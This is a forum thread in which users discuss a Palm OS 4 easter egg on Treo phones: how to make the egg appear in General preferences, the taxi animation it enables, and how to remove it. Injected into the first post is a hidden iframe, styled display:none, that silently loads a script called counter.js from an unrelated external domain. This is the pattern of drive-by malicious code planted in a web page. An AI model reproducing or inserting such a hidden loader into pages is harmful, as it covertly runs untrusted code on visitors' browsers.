+ Reply to Thread

Palm OS 4 easter egg?

I noticed that the 7135 on OS 4 has an easter egg feature just like the 6035 OS 3.5. I tried searching here and on Google, with no explanation of what it does. Anyone know?

To get the egg:
    Go to PDA prefs, General page.
    Draw a small counterclockwise circle with the stylus in the bottom right corner of the display (about 1/4 cm away from the corner), and an egg will appear where you drew.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

They are Hidden pictures left by the Palm Developers:

Here's another one:
    http://www.palminfocenter.com/view_story.asp?ID=755
    iPhone therefore iAm.

iPhone therefore iAm.

iPhone therefore iAm.

Originally posted by Steve
    They are Hidden pictures left by the Palm Developers:
    Here's another one:
    http://www.palminfocenter.com/view_story.asp?ID=755
    Yeah, I added the Easter Egg image to my 6035 about a year and a half ago when I read bout it in a book. Then when I transfered my stuff to my 7135, it must have come over too, because it is on my 7135 and every once in awhile the little taxi cab wanders across my screen for no reason at all. It is a fun surprise.
    ~'kito
    pdaPhoneHome Moderator

Fut
    Originally posted by Markito
    Yeah, I added the Easter Egg image to my 6035 about a year and a half ago when I read bout it in a book. Then when I transfered my stuff to my 7135, it must have come over too, because it is on my 7135 and every once in awhile the little taxi cab wanders across my screen for no reason at all. It is a fun surprise.
    hehehe. ummm.... i know this is a dumb question, but uh.... how do i disable that one? i enabled it on my i300 pretty much right when i got it, and totally forgot about that till just recently. understandably, it does no harm, it'd just be nice to know.

Originally posted by Fut
    hehehe. ummm.... i know this is a dumb question, but uh.... how do i disable that one? i enabled it on my i300 pretty much right when i got it, and totally forgot about that till just recently. understandably, it does no harm, it'd just be nice to know.
    Go to general prefs and tap the easter egg to make it disappear.

Fut
    Originally posted by KLiuLess
    Go to general prefs and tap the easter egg to make it disappear.
    Sure is a stubborn bugger- won't go without a fight. Any more possibilities to get rid of the Easter Egg.....easter..egg?

Originally posted by Fut
    Sure is a stubborn bugger- won't go without a fight. Any more possibilities to get rid of the Easter Egg.....easter..egg?
    I suggest leaving it alone. The only way I can think of to get rid of it is to remove the entry in the Saved_Preferences.prc using an app like PrefEd. I'm not even sure which entry has it... plus, you'll probably kill some of your other settings too.

Perhaps draw the circle around it again, like you did to make it appear? Just a guess.
    ~'kito
    pdaPhoneHome Moderator

Registered User All-Purpose Guru's Avatar
    Originally posted by KLiuLess
    I suggest leaving it alone. The only way I can think of to get rid of it is to remove the entry in the Saved_Preferences.prc using an app like PrefEd. I'm not even sure which entry has it... plus, you'll probably kill some of your other settings too.
    To make the easter egg appear-- draw an "o" where it should be.
    To make it go away-- draw the "o" again.

The Easter Egg state is stored in the Saved Preferences, but I wouldn't recommend hacking around in there. Too many apps depend on the Saved Preferences.

The Easter Egg is used to determine when, if at all, the other easter eggs appear.

Most of the Easter Eggs in PalmOS are hooked through this preference. The one notable exception *is* the Taxi, which can always appear based on a complicated formula controlled by the system clock.

The Taxi appears much more often when the Easter Egg is on-- and the shortcut to make it appear *is* controlled by the Easter Egg.

Note that if you turn off the Easter Egg, one of the easter eggs you disable is the ability to enter URLs into Web Clipping directly.
    --apg

"Invention, my dear friends, is ninety-three percent perspiration, six percent electricity, four percent evaporation, and two percent butterscotch ripple." --W. Wonka

I can't seem to get the taxi to drive across like on my 6035. The egg is on... I tried it in Memos, the general prefs screen, the launcher, nothing happens!
    I'm pressing pagedown and making a stylus stroke from the center of the letter area to the left edge of the silkscreen.

Mine just comes and goes whenever he pleases. Luckily the meter isn't running!
    ~'kito
    pdaPhoneHome Moderator

But I miss my taxi! :p Anyone gotten this to work on the 7135?

Quoting myself from earlier in this thread...

Originally posted by Markito
    ~'kito
    pdaPhoneHome Moderator

Oh, I guess I should have clarified what I meant by "I want my taxi". I meant that I want to be able to call the taxi on demand by hold page-down and drawing the pen stroke...

But I guess it wouldn't be a taxi then, but a chauffeur!

I still would like to call it on demand... does this work for anyone?